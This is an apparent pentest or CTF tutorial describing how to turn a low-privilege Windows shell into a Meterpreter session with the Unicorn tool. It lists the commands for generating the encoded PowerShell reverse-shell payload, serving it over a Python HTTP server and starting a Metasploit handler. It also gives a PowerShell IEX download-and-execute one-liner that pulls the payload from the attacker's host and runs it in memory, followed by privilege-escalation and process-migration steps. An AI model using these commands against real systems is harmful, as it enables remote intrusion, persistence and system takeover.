Unicorn — Low Priv Shell to Meterpreter Session

The context here is to assume that you already have a low privileged shell on a target machine (in my case its on a vulnerable web server). The goal here is to get a Meterpreter shell and conduct privilege escalation and achieve persistence from there.


What is Unicorn?

Unicorn is a tool for using a Powershell downgrade attack and injecting shell code straight into memory. This tool/technique was presented by David Kennedy (Trusted Sec) and Josh Kelly at Defcon 18.
You can find the tool below.
https://github.com/trustedsec/unicorn
You can find a link to their Defcon 18 presentation below.
https://www.youtube.com/watch?v=q5pA49C7QJg

Step One — Running Unicorn.

In this scenario we will be running unicorn to create a reverse tcp shell on a windows host.

The commandline syntax for this tool will look like this, ./unicorn.py <payload> <LHOST> <LPORT>
The result will be two files, unicorn.rc(Metasploit configuration to quickly spawn a handler) and powershell_attack.txt(encoded powershell command to create a meterpreter session back to the handler).

Step Two — Modify Powershell attack.

We want to modify the Powershell attack here because we are not going to be running the Powershell attack as a script, instead we are going to use Invoke-Expression and pull the Powershell attack from a malicious web server and execute it in memory.

The following is the actual encode powershell command.

powershell_attack.txt
Open a new file in vi, the extension is irrelevant; also copy all text from powershell_attack.txt

Paste the content of powershell_attack.txt into the file you just create, attack.txt.

Delete — powershell /w 1 /C “ — from the beginning of the document. Delete — “ — from the end of the document. We won’t need this part, as we will be running powershell and loading and executing this command from the shell we already have on our victim in this scenario.

Save the document.


Step 3 — Create a simpleHTTPServer on your attacker machine.

Create an http server in the directory you have your powershell payload in.

python -m SimpleHTTPServer

Step 4— Create a listener using multi/handler

You can do this one, one of two ways. You can use the .rc file unicorn created by running:

msfconsole -r unicorn.rc

This will automatically start your handler in metasploit. You can also run it manually if you have issues with that by running the following:

Setting up a handler in metasploit

Step 5 — Use powershell to call your malicious powershell script on the victim machine.

Use the following command on your low privileged shell to load and execute the malicious powershell payload on the victim machine:

powershell “IEX(New-Object Net.WebClient).downloadString(‘http://10.10.14.29:8000/attack.html')"

Two things will happen here. You will see the victim reaching out to your HTTP server to get the malicious payload. Shortly after you will see your Meterpreter handler spawn a session when the victim successfully executes the Powershell command.


From here, ideally you’d do privilege escalation.

A example scenario would be you have a meterpreter session.

You run sysinfo and find that you have a x86 bit meterpreter shell on a x64 bit windows system.

Your next move would be to backround this session and use “multi/recon/local_exploit_suggester” on it.

Your next move would be to find a new x64 bit process that looks like it will be around for awhile and migrate to that process. “migrate <pid>”.

You would use the exploit suggester again. Since the meterpreter shell matches the os architecture, you will have different results.

I would start by using the first exploit the system is vulnerable to, that shows up both times you ran the suggester.

Good Luck! Get System/r00t!